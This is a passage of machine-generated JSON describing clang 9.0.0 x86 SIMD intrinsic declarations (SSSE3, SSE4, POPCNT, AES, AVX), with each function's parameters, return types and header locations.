"tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:582:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_shuffle_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:607:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sign_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:633:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sign_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sign_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:685:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sign_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:711:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sign_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:737:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sign_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tmmintrin.h:763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_blendv_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_blendv_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:458:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_blendv_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mullo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:534:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mul_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:554:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_stream_load_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:645:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":pointer", "type": { "tag": "__m128i" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:665:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:684:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:703:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:722:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:741:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:760:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:779:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:798:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_testz_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testc_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_testnzc_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cmpeq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1230:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1251:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1293:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1312:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1331:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1351:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1370:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1427:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_packus_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_minpos_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1534:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpgt_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:2338:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V1", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__V2", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_crc32_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:2359:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_crc32_u16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:2379:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_crc32_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:2399:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_crc32_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:2420:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_popcnt_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/popcntintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_popcnt_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/popcntintrin.h:44:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_aesenc_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:35:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__R", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_aesenclast_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:55:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__R", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_aesdec_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:75:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__R", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_aesdeclast_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:95:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__R", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_aesimc_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_aes.h:112:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_clflushopt", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clflushoptintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_clwb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clwbintrin.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "__v4df", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:17:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8sf", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:18:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4di", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:19:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8si", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:20:13", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16hi", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:21:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v32qi", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:22:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4du", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:25:28", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8su", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:26:22", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16hu", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:27:24", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v32qu", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:28:23", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v32qs", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:32:21", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:34:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256d", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:35:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256i", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:36:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256_u", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:38:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256d_u", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:39:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m256i_u", "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:40:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_mm256_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:60:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:78:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:96:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_addsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_addsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:152:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:170:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:188:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:245:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:282:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:300:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:317:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_rsqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:351:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_rcp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:368:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_and_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:520:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_and_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:538:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_andnot_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:559:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_andnot_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:580:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" 